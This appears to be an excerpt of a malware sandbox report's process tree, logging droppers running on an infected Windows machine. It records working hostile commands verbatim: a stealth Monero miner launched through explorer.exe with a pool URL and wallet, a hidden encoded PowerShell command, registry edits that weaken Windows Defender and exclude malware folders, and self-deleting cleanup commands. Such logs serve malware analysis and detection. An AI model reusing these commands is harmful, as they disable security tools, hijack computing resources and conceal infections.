C:\Windows\SysWOW64\taskkill.exetaskkill /im 26453032185.exe /f9⤵
- Kills process with taskkill
PID:7368
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
PID:8788
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{QJZZ-qrgwL-RGdv-FAYAk}\44465805558.exe" /mix6⤵PID:6628
-
C:\Users\Admin\AppData\Local\Temp\{QJZZ-qrgwL-RGdv-FAYAk}\44465805558.exe"C:\Users\Admin\AppData\Local\Temp\{QJZZ-qrgwL-RGdv-FAYAk}\44465805558.exe" /mix7⤵PID:5344
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\uNuniNTUIop & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{QJZZ-qrgwL-RGdv-FAYAk}\44465805558.exe"8⤵PID:7600
-
C:\Windows\SysWOW64\timeout.exetimeout 39⤵
- Delays execution with timeout.exe
PID:7664
-
-
-
C:\Users\Admin\AppData\Local\Temp\Joirk.exe"C:\Users\Admin\AppData\Local\Temp\Joirk.exe"8⤵PID:6208
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "TpPta2e3M4dm9YJkW8O1GP75.exe" /f & erase "C:\Users\Admin\Documents\TpPta2e3M4dm9YJkW8O1GP75.exe" & exit6⤵PID:5852
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "TpPta2e3M4dm9YJkW8O1GP75.exe" /f7⤵
- Kills process with taskkill
PID:1716
-
-
-
-
C:\Users\Admin\Documents\g2JJdaGr0Lpf6ZLr3fD7wEzT.exe"C:\Users\Admin\Documents\g2JJdaGr0Lpf6ZLr3fD7wEzT.exe"5⤵PID:6432
-
C:\Users\Admin\Documents\g2JJdaGr0Lpf6ZLr3fD7wEzT.exe"C:\Users\Admin\Documents\g2JJdaGr0Lpf6ZLr3fD7wEzT.exe"6⤵PID:6968
-
-
-
C:\Users\Admin\Documents\BybTygK2T5m3w1Ww9kxGM6nk.exe"C:\Users\Admin\Documents\BybTygK2T5m3w1Ww9kxGM6nk.exe"5⤵PID:5160
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo yLBUjKkTN6⤵PID:6324
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe < Infervora.aac6⤵PID:2188
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe7⤵PID:2300
-
-
-
-
C:\Users\Admin\Documents\T1hYfv6FL1x6XAY2y4CkL00k.exe"C:\Users\Admin\Documents\T1hYfv6FL1x6XAY2y4CkL00k.exe"5⤵PID:6392
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{rurQ-0H5SQ-bclx-uZEVs}\26262922459.exe"6⤵PID:4860
-
C:\Users\Admin\AppData\Local\Temp\{rurQ-0H5SQ-bclx-uZEVs}\26262922459.exe"C:\Users\Admin\AppData\Local\Temp\{rurQ-0H5SQ-bclx-uZEVs}\26262922459.exe"7⤵PID:7100
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 26262922459.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{rurQ-0H5SQ-bclx-uZEVs}\26262922459.exe" & del C:\ProgramData\*.dll & exit8⤵PID:6808
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 26262922459.exe /f9⤵
- Kills process with taskkill
PID:7532
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
PID:8036
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{rurQ-0H5SQ-bclx-uZEVs}\04813020005.exe" /mix6⤵PID:6312
-
C:\Users\Admin\AppData\Local\Temp\{rurQ-0H5SQ-bclx-uZEVs}\04813020005.exe"C:\Users\Admin\AppData\Local\Temp\{rurQ-0H5SQ-bclx-uZEVs}\04813020005.exe" /mix7⤵PID:6992
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "T1hYfv6FL1x6XAY2y4CkL00k.exe" /f & erase "C:\Users\Admin\Documents\T1hYfv6FL1x6XAY2y4CkL00k.exe" & exit6⤵PID:4944
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "T1hYfv6FL1x6XAY2y4CkL00k.exe" /f7⤵
- Kills process with taskkill
PID:6816
-
-
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\vlcplayer.exe"C:\Program Files (x86)\Versium Research\Versium Research\vlcplayer.exe"3⤵PID:5320
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"4⤵PID:9032
-
C:\Windows\explorer.exeC:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=7 --unam-idle-cpu=70 --tls --unam-stealth5⤵PID:9148
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\black_.exe"C:\Program Files (x86)\Versium Research\Versium Research\black_.exe"3⤵PID:5392
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4356
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4540
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:4280
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 70B38B667EBB362A25755E653E1FABC0 C2⤵PID:5336
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D539FC523B9B88EAB570F59DCC7F102B2⤵PID:5240
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵PID:5780
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵PID:4532
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4760
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5748
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4064
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2388
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:7116
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:2568
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6420
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4356
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4492
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5380
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:3344
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4580
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:8172
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{19361697-2886-4e45-825d-4a137310f558}\oemvista.inf" "9" "4d14a44ff" "0000000000000178" "WinSta0\Default" "0000000000000174" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:6044
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000190"2⤵PID:7744
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:4304
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:6812
-
C:\Users\Admin\AppData\Local\Temp\New Feature\5.exe"C:\Users\Admin\AppData\Local\Temp\New Feature\5.exe"1⤵PID:6848
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6848 -s 15282⤵
- Program crash
PID:8628
-
-
C:\Users\Admin\AppData\Local\Temp\New Feature\vpn.exe"C:\Users\Admin\AppData\Local\Temp\New Feature\vpn.exe"1⤵PID:6548
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵PID:7996
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CmD < Cio.mui2⤵PID:3972
-
C:\Windows\SysWOW64\cmd.exeCmD3⤵PID:4392
-
-
-
C:\Users\Admin\AppData\Local\Temp\New Feature\6.exe"C:\Users\Admin\AppData\Local\Temp\New Feature\6.exe"1⤵PID:8184
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵PID:4316
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c CmD < Estate.mp42⤵PID:3120
-
C:\Windows\SysWOW64\cmd.exeCmD3⤵PID:8116
-
-
-
C:\Users\Admin\AppData\Local\Temp\New Feature\4.exe"C:\Users\Admin\AppData\Local\Temp\New Feature\4.exe"1⤵PID:7856
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵PID:4264
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:8732
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:6996
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:7236
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4208
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8564
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7788
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5164
-
C:\Users\Admin\AppData\Local\Temp\is-P535U.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-P535U.tmp\Setup3310.tmp" /SL5="$70470,138429,56832,C:\Users\Admin\AppData\Local\Temp\qb0qnq3pupg\Setup3310.exe" /Verysilent /subid=5771⤵PID:8800
-
C:\Users\Admin\AppData\Local\Temp\is-2N8GQ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-2N8GQ.tmp\Setup.exe" /Verysilent2⤵PID:7784
-
-
C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\kOTzNYG.exeC:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\kOTzNYG.exe 9n /site_id 754 /S1⤵PID:6076
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"2⤵PID:2596
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:6544
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:6376
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:8900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:7276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:7048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:6676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:7956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:6452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:7232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:5896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:7552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:7240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:7256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:6492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:6212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:8656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:8488
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EvBjrtBtUyzDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EvBjrtBtUyzDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TZXwQNgcU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TZXwQNgcU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mDMOhBxZSaUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mDMOhBxZSaUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nZosbjLfGLdU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nZosbjLfGLdU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogqTxBaMVNngTiWEorR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ogqTxBaMVNngTiWEorR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\otlZYwPmfIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\otlZYwPmfIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\achrhaRRbsGknaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\achrhaRRbsGknaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ptSbhgFrGptQLEdh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ptSbhgFrGptQLEdh\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:8884
-
-
C:\Users\Admin\AppData\Local\Temp\F3C8.tmp.exeC:\Users\Admin\AppData\Local\Temp\F3C8.tmp.exe1⤵PID:7944
-
